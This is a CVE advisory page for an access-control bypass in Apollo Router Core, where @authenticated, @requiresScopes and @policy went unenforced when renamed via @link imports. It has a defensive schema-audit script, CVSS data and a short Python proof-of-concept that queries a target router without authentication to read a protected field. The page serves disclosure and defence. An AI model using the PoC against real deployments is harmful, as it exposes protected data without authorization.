Security Vulnerability Report
CVE-2025-64347 CVSS 7.5 HIGH

CVE-2025-64347

Published: 2025-11-07 18:15:37
Last Modified: 2026-04-15 00:35:42

Description

Apollo Router Core is a configurable Rust graph router written to run a federated supergraph using Apollo Federation 2. Versions 1.61.12-rc.0 and below and 2.8.1-rc.0 allow unauthorized access to protected data through schema elements with access control directives (@authenticated, @requiresScopes, and @policy) that were renamed via @link imports. Router did not enforce renamed access control directives on schema elements (e.g. fields and types), allowing queries to bypass those element-level access controls. This issue is fixed in versions 1.61.12 and 2.8.1.
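The root cause is that the router matched the three access-control directives by their canonical names, so a schema that imported them under another name via `@link` left the annotated fields unprotected. A defender can check whether any of their subgraph schemas are in that situation before (and after) upgrading. The following is an added example, not code from the CVE record or from Apollo's own tooling: a small audit script that scans a subgraph SDL for `@link` imports that rename `@authenticated`, `@requiresScopes` or `@policy`, and lists the fields annotated with the renamed alias. The sample schema embedded in it is constructed for the example, and the regex-based parsing is a simplification of real GraphQL parsing (it assumes one directive per field line and no `)` or `]` inside the `@link` arguments).

```python
# Added example (not part of the CVE record or Apollo's code): audit a subgraph
# SDL for @link imports that rename the access-control directives named in the
# advisory. Renamed imports were exactly the condition under which Apollo Router
# before 1.61.12 / 2.8.1 stopped enforcing them, so fields found here should be
# treated as unprotected until the router is upgraded.
import re

# Directives the advisory says were not enforced when renamed.
ACCESS_CONTROL_DIRECTIVES = {"@authenticated", "@requiresScopes", "@policy"}

# One @link(...) application; the argument text is captured.
LINK_RE = re.compile(r"@link\s*\(([^)]*)\)", re.DOTALL)
# The import list inside a @link application (assumes no nested ']').
IMPORT_LIST_RE = re.compile(r"import\s*:\s*\[(.*?)\]", re.DOTALL)
# Object-form import, the only form that can rename: {name: "@x", as: "@y"}
RENAME_RE = re.compile(r'\{\s*name\s*:\s*"([^"]+)"\s*,\s*as\s*:\s*"([^"]+)"\s*\}')
# A type or interface definition and its field block.
TYPE_RE = re.compile(r"\b(?:type|interface)\s+(\w+)[^{]*\{([^}]*)\}", re.DOTALL)
# A field line: name, optional argument list, then ':'.
FIELD_RE = re.compile(r"\s*(\w+)\s*(?:\([^)]*\))?\s*:")


def find_renamed_access_directives(sdl: str) -> dict:
    """Return {alias: original} for every access-control directive that a
    @link import renames, e.g. {"@customAuth": "@authenticated"}."""
    renamed = {}
    for link in LINK_RE.finditer(sdl):
        imports = IMPORT_LIST_RE.search(link.group(1))
        if not imports:
            continue
        for name, alias in RENAME_RE.findall(imports.group(1)):
            if name in ACCESS_CONTROL_DIRECTIVES and alias != name:
                renamed[alias] = name
    return renamed


def fields_using_alias(sdl: str, alias: str) -> list:
    """List 'Type.field' entries whose field line carries the renamed alias."""
    hits = []
    alias_re = re.compile(re.escape(alias) + r"\b")
    for type_name, body in TYPE_RE.findall(sdl):
        for line in body.splitlines():
            line = line.split("#", 1)[0]  # drop GraphQL line comments
            field = FIELD_RE.match(line)
            if field and alias_re.search(line):
                hits.append(f"{type_name}.{field.group(1)}")
    return hits


def audit(sdl: str) -> list:
    """Findings: every field protected only by a renamed access-control
    directive, with the alias and the directive it stands for."""
    findings = []
    for alias, original in find_renamed_access_directives(sdl).items():
        for field in fields_using_alias(sdl, alias):
            findings.append({"field": field, "alias": alias, "directive": original})
    return findings


# Constructed sample subgraph schema (hypothetical; not from the advisory).
SAMPLE_SDL = '''
extend schema
  @link(url: "https://specs.apollo.dev/federation/v2.3",
        import: ["@key", {name: "@authenticated", as: "@customAuth"},
                 {name: "@requiresScopes", as: "@scoped"}])

type Query {
  sensitiveData: ProtectedData
  publicData: String
}

type ProtectedData @key(fields: "id") {
  id: ID!
  secretInfo: String @customAuth   # renamed @authenticated
  billing(limit: Int): String @scoped(scopes: [["billing:read"]])
}
'''

if __name__ == "__main__":
    for finding in audit(SAMPLE_SDL):
        print(f"{finding['field']}: {finding['alias']} is a renamed "
              f"{finding['directive']} (unenforced on affected router versions)")
```

Run against each subgraph SDL in a supergraph; an empty result means the schema does not rename any of the three directives and is not exposed through this bug. A non-empty result on a router older than the fixed versions means those fields are reachable without the intended authentication, scope or policy check.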

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Apollo Router Core < 1.61.12 (1.61.12-rc.0 and below)
Apollo Router Core < 2.8.1 (2.8.1-rc.0 and below)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64347 PoC - Apollo Router Core Access Control Bypass
# This PoC demonstrates how a renamed @authenticated directive can bypass access control

import requests

# Step 1: Create a malicious subgraph schema with a renamed access control directive.
# ("@key" is added to the import list so the schema composes; the rename is the point.)
MALICIOUS_SCHEMA = '''
extend schema
  @link(url: "https://specs.apollo.dev/federation/v2.3",
        import: ["@key", {name: "@authenticated", as: "@customAuth"}])

type Query {
  sensitiveData: ProtectedData
}

type ProtectedData @key(fields: "id") {
  id: ID!
  secretInfo: String @customAuth  # Renamed directive, bypasses router check
}
'''

# Step 2: Craft GraphQL query to exploit the vulnerability
EXPLOIT_QUERY = '''
query {
  sensitiveData {
    id
    secretInfo  # This should require authentication but bypasses check
  }
}
'''

# Step 3: Send unauthenticated request to Apollo Router
router_url = "http://target-apollo-router:4000"
response = requests.post(
    f"{router_url}/graphql",
    json={"query": EXPLOIT_QUERY},
    headers={"Content-Type": "application/json"},
    timeout=10,
)

# Expected: an enforcing router returns secretInfo as null with an error entry;
# an affected router returns the field's value. Check the data object rather
# than the raw body, since the field name also appears in error messages.
data = {}
if response.status_code == 200:
    data = (response.json().get("data") or {}).get("sensitiveData") or {}
if data.get("secretInfo") is not None:
    print("VULNERABLE: Access control bypassed - sensitive data leaked!")
else:
    print("PATCHED: Access control properly enforced")
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-64347", "sourceIdentifier": "[email protected]", "published": "2025-11-07T18:15:37.313", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apollo Router Core is a configurable Rust graph router written to run a federated supergraph using Apollo Federation 2. Versions 1.61.12-rc.0 and below and 2.8.1-rc.0 allow unauthorized access to protected data through schema elements with access control directives (@authenticated, @requiresScopes, and @policy) that were renamed via @link imports. Router did not enforce renamed access control directives on schema elements (e.g. fields and types), allowing queries to bypass those element-level access controls. This issue is fixed in versions 1.61.12 and 2.8.1."}, {"lang": "es", "value": "Apollo Router Core es un router de grafo configurable en Rust escrito para ejecutar un supergrafo federado usando Apollo Federation 2. Las versiones 1.61.12-rc.0 e inferiores y 2.8.1-rc.0 permiten el acceso no autorizado a datos protegidos a través de elementos de esquema con directivas de control de acceso (@authenticated, @requiresScopes y @policy) que fueron renombrados a través de importaciones @link. El router no aplicaba las directivas de control de acceso renombradas en elementos de esquema (p. ej., campos y tipos), permitiendo que las consultas eludieran esos controles de acceso a nivel de elemento. Este problema se corrige en las versiones 1.61.12 y 2.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/apollographql/router/commit/78e4b20a2fc26cc5f141aa47992ed85375266a2b", "source": "[email protected]"}, {"url": "https://github.com/apollographql/router/security/advisories/GHSA-g8jh-vg5j-4h3f", "source": "[email protected]"}]}}
```